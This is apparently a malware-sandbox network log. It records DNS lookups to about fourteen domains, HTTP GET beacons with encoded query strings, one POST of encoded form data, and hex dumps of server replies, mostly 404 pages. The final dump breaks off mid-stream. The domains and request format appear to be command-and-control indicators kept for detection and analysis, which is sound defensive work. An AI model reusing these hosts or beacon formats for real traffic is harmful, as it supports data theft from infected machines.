Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 08 Oct 2024 13:55:46 GMTserver: Apacheset-cookie: __tad=1728395746.2134099; expires=Fri, 06-Oct-2034 13:55:46 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
Source: global traffic HTTP traffic detected: GET /2jit/?5xn03=7vMx2HlPWl&I4ET5=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SoEkaj2DIJpzLN/p7keITu3kRidpknmkeFNiZOa1jl486ZzlEj4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.elsupertodo.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic HTTP traffic detected: GET /7xi5/?I4ET5=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAz/7PAbspGHYrJhwiAgKAJ54r5fuZ48YeCJJLAh0jfNMUyJhiqw=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.omexai.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic HTTP traffic detected: GET /fpzw/?I4ET5=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx4v2Cu8U6PY7doS41bFIW7T/4/1mYTXkrfUCe/4cLGyNDvWcha0=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tekilla.wtfConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic HTTP traffic detected: GET /3qit/?I4ET5=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYQz0a67JVPuK3DRmcV/dEWB275yuHlkBzmr1SLVBbDDm50CRvDPY=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bola88site.oneConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic HTTP traffic detected: GET /nxfn/?I4ET5=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfWaAaU8Sg/CwIadyJZ1Vunf0ESMtavaN5FCA7KYOqo/KmyEXwiQ=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.languagemodel.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic HTTP traffic detected: GET /3bdq/?I4ET5=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exv0kyrqFFpmLMz7jnyzN+XheUDXt53FO2cfXJKOJNKmSe0FPHbZU=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kexweb.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic HTTP traffic detected: GET /ikh0/?5xn03=7vMx2HlPWl&I4ET5=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uL6vU7t5jilJUCYKPYTSTWzBlftPtFsf3/wj5zdrQAyp0VL/hTg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jobworklanka.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic HTTP traffic detected: GET /h7lb/?I4ET5=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0U8wzgLDyi+d9/jciraahzpwjZL5E+FLfjf2KFU0ZNlPPutFUmc0=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dyme.techConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic HTTP traffic detected: GET /e0nr/?I4ET5=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txL1JCWIKw0rFG3lN0WjCCPv2jnxqsoqX4CWEeQPgrQsdkl4cxLCA=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mizuquan.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic HTTP traffic detected: GET /pp43/?I4ET5=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVv7vDFAlSLEfPMEOpIiPv+zP5mxeS8lh+Zk12JkSAI62mQlNqC9c=&5xn03=7vMx2HlPWl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.nobartv6.websiteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic DNS traffic detected: DNS query: www.woshop.online
Source: global traffic DNS traffic detected: DNS query: www.kxshopmr.store
Source: global traffic DNS traffic detected: DNS query: www.elsupertodo.net
Source: global traffic DNS traffic detected: DNS query: www.omexai.info
Source: global traffic DNS traffic detected: DNS query: www.tekilla.wtf
Source: global traffic DNS traffic detected: DNS query: www.bola88site.one
Source: global traffic DNS traffic detected: DNS query: www.languagemodel.pro
Source: global traffic DNS traffic detected: DNS query: www.kexweb.top
Source: global traffic DNS traffic detected: DNS query: www.jobworklanka.online
Source: global traffic DNS traffic detected: DNS query: www.dyme.tech
Source: global traffic DNS traffic detected: DNS query: www.arlon-commerce.com
Source: global traffic DNS traffic detected: DNS query: www.mizuquan.top
Source: global traffic DNS traffic detected: DNS query: www.nobartv6.website
Source: global traffic DNS traffic detected: DNS query: www.sailnway.net
Source: unknown HTTP traffic detected: POST /7xi5/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.omexai.infoOrigin: http://www.omexai.infoContent-Type: application/x-www-form-urlencodedContent-Length: 210Connection: closeCache-Control: max-age=0Referer: http://www.omexai.info/7xi5/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)Data Raw: 49 34 45 54 35 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 79 6a 62 61 2f 72 2f 51 76 44 6b 47 77 4d 70 6e 6b 78 36 6f 6c 57 6d 45 72 30 48 41 54 79 45 30 54 6e 36 79 4c 6c 66 34 6d 6e 33 Data Ascii: I4ET5=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5yjba/r/QvDkGwMpnkx6olWmEr0HATyE0Tn6yLlf4mn3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:53:51 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:53:53 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:53:56 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:53:58 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:54:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:54:07 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:54:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 08 Oct 2024 13:54:12 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 